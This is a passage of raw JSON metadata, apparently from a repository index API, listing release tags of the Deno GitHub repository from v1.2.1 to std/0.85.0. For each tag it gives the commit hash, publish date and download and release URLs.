11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html